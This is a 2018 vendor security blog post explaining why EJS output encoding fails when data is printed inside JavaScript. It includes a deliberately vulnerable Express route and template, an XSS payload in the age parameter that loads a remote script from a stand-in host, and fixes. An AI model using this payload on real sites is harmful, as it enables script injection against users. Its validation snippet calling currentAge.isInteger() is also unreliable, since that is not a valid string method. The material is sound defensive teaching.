/aug 15, 2018

Node.js Template Engines: Why Default Encoders Are Not Enough

By Bipin Mistry

Escaping is an important security control for preventing cross-site scripting (XSS) in web applications. Escaping is the process of converting certain characters, like <, >, quotation markets, etc. into safe characters. By escaping, you reduce the likelihood of the browser rendering certain characters as HTML when it’s not supposed to.

OWASP.org provides us with a nice definition:

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Going forward, we'll refer to escaping as encoding. Encoding is a fancier way of describing the process of converting untrusted characters into a "safe" format.

Template Engines to the Rescue...

Fortunately, several popular Node.js template engines offer encoding syntax so you can avoid a majority of scenarios that lead to XSS vulnerabilities.

Here are some syntax considerations for popular templating frameworks:

Template Engine Encode output Allow raw output (no encoding)
EJS <%= text goes here %> <%- text goes here %>
Mustache and Handlebars {{ text goes here }} {{{ text goes here }}}
Pug #{ text goes here } !{ text goes here }

In today's post, we'll be using EJS.

Context is King

Despite use of encoding syntax, XSS can still occur. How is this possible?

In this example, we have a Node.js app that uses Express and EJS for templating. Our app takes a user-supplied age (via the age query parameter), determines the correct target date mutual funds on the server-side, and prints the fund name to the user (see circle #1 in the image below).

Blog JS Context Example

Here’s the Node.js code that selects a mutual fund given a user-supplied age. The code maps the 401k.ejs EJS template to three data objects:

  • currentAge (which should always be an integer)
  • retireAt (a hard-coded retirement age)
  • selectedFund (a string returned from the determineTargetDateFund() method)
/* --------------------------------
// routes.js
*/ --------------------------------

   app.get('/401k', function(req, res) {

       var currentAge = req.query.age;
       var retireAt = 65;
      
       var selectedFund = determineTargetDateFund(currentAge, retireAt);

       res.render('pages/401k', {
           currentAge: currentAge,
           retireAt: retireAt,
           selectedFund: selectedFund
       });

   });

The template looks like this:

<!--
// 401k.ejs
//-->

<h3>What target date fund should you pick?</h3>

Enter your age:
<form action="/401k" method="GET">
   <input name="age" size="5" value="<%= currentAge %>" onblur="updateYearsAwayFromRetirement(this.value)">
   <input type="submit" value=" Go ">

   <br>

   <span id="yearsAwayFromRetirement" style="font-style: italic"></span>
</form>

<p>&nbsp;</p>

<% if(selectedFund) { %>
   You should select this fund: <span><%= selectedFund %></span>
<% } %>

<script language="javascript">
   //Initialize page with age submitted to server
   updateYearsAwayFromRetirement(<%= currentAge %>)

   function updateYearsAwayFromRetirement(ageValue) {
       retireAt = <%= retireAt %>;
       currentAge = ageValue;

       if(currentAge) {
           document.getElementById('yearsAwayFromRetirement').innerText = retireAt - currentAge + ' years away from retiring at age ' + retireAt;
       }
   }
</script>

In every scenario, you’ll see that we use EJS encode syntax before printing it to the page: <%= template_variable_goes_here %>.

That's good, but not 100% foolproof.

JavaScript != HTML Context

If you look closely, you'll see the EJS variable currentAge printed as an argument of the JavaScript function updateYearsAwayFromRetirement() at template render time. This is JavaScript context (!)

This function is subsequently called by the browser on page load to calculate the number of years until retirement (circle #2 in the image above). If the user submitted an age of '45', then the page source will look like this:

Blog Printed Inside JS Context 1

In general, you should avoid printing template data inside JavaScript context. Even if you are encoding the data, EJS and other template engines will NOT consider all possible contexts - such as the context of a JavaScript function or script block. This behavior means benign characters in an HTML context can be harmful inside a JavaScript context.

Attack Example

To recap, we print the currentAge variable using EJS encoding syntax (<%= %>) in two locations of 401k.ejs:

  1. As an argument inside updateYearsAwayFromRetirement() (JavaScript context)
  2. As the initial value of the "Enter your age" text field (HTML context)

The EJS encoding syntax works great in the HTML context, but fails to prevent XSS attacks in the JavaScript context. For example, consider what happens when you pass the following string into the age query parameter:

45); var s = document.createElement(`script`); s.src = `http://example.com/someEvilScript.js`; document.body.appendChild(s); //

You'll notice we are using backticks (`). In HTML context, backticks are benign and treated as text. However, in JavaScript context, backticks are interpreted!

You'll see the full string appear in the source, and a request to someEvilScript.js in the console!

Blog Injected JS Attack

Blog Injected Vulnerable JavaScript

How to Fix

In all cases, double-check context before you print data to a page. JavaScript context isn't the only "non-HTML" context that the browser interprets. Other contexts, like style tags and comment tags, will require different encoders.
(Read more at the OWASP.org XSS Prevention Cheat Sheet.)

Even though we're allowing EJS to automatically encode output, we need to add additional encoding on the server-side to avoid the attack scenario illustrated above.

In many scenarios, output encoding (e.g., removing unsafe characters before printing them to a page) is the best defense against XSS attacks.

For the example above, we want to ensure the currentAge variable is always an integer. You can also perform input validation so we can reliably calculate the correct mutual fund without invalid characters ever getting in the way.

Input Validation

First, we want to make sure the app properly handles scenarios where non-integer values are passed into the age query parameter.

To do this, we perform input validation on the currentAge variable by verifying the data is an integer and greater than zero.

/* --------------------------------
// routes.js
*/ --------------------------------

app.get('/401k', function(req, res) {
    var currentAge = req.query.age;
    var retireAt = 65;
    
    //Perform input validation on the currentAge variable
    if(currentAge.isInteger() && currentAge > 0) {
    
        //continue...
    }else{
    
        //throw error...
    }

Output Encoding and Filtering

This is the most important step. As I mentioned earlier, encoding is the process of converting untrusted characters into a safe format. Filtering is a bit different and removes untrusted or unwanted characters from the data.

Whenever data is passed to the template engine, output encoding and/or filtering should occur - even if it's just a final sanity check. In our example, we're going to filter results by removing any non-integer values from the currentAge variable.

/* --------------------------------
// routes.js
*/ --------------------------------

...
res.render('pages/401k', {
    //Removes any characters that are 'not digits'
    currentAge: (currentAge || '').replace(/\D/g,''),
    retireAt: retireAt,
    selectedFund: selectedFund
});
...

Recommendations

The above example may manifest itself in web applications with heavy JavaScript front-end architectures. XSS in JavaScript context is not as prolific as XSS in HTML context, but our example highlights the risk of over-reliance on template engines for security.

Here are a few tips:

  • Understand your context and apply output encoding and/or filtering
  • Avoid printing data in JavaScript context, period: In our example, we printed data from the server-side directly into JavaScript context. When possible, avoid printing data in JavaScript context entirely. If you cannot avoid it, be sure to apply additional output encoding logic on the server-side before passing it to the template engine.
  • Harden web apps with a Content-Security-Policy: While not a fix for underlying XSS vulnerability, this configuration can reduce the impact of an XSS attack.
  • Keep business logic in one place: A general best practice.

Want a demo of Veracode Interactive Analysis?

Veracode Interactive Analysis (IAST) helps teams instantly discover vulnerabilities in their applications at runtime by embedding security into their development processes and integrating directly into their CI/CD pipelines. Get a demo.

Related Posts

By Bipin Mistry

Bipin Mistry is Sr. Director of Product Management for WAS/IAST product line.  Prior to joining Veracode he was VP Product Management for NEC/Netcracker in their SDN/NFV and Security business unit.  At NEC/Netcracker Bipin’s primary focus is to develop solutions and architectures specifically mapped to NFV/SDN and Orchestration. He has over 28 years expertise in Security, Software Architectures, Mobile and Core Networking Technologies, Product Management, Marketing, Engineering and Sales.  Prior to joining NEC/Netcracker Bipin was VP President of Product Management for a security startup in the field of DDoS analysis and mitigation.  Bipin has also held architectural and management roles at both Juniper Networks (Chief Mobile Architect) and Cisco Systems (Sr. Director of SP Architecture).

Bipin lives Shrewsbury MA with his wife and 2 children.  In his spare time Bipin is a keen runner and is currently attempting to learn Spanish.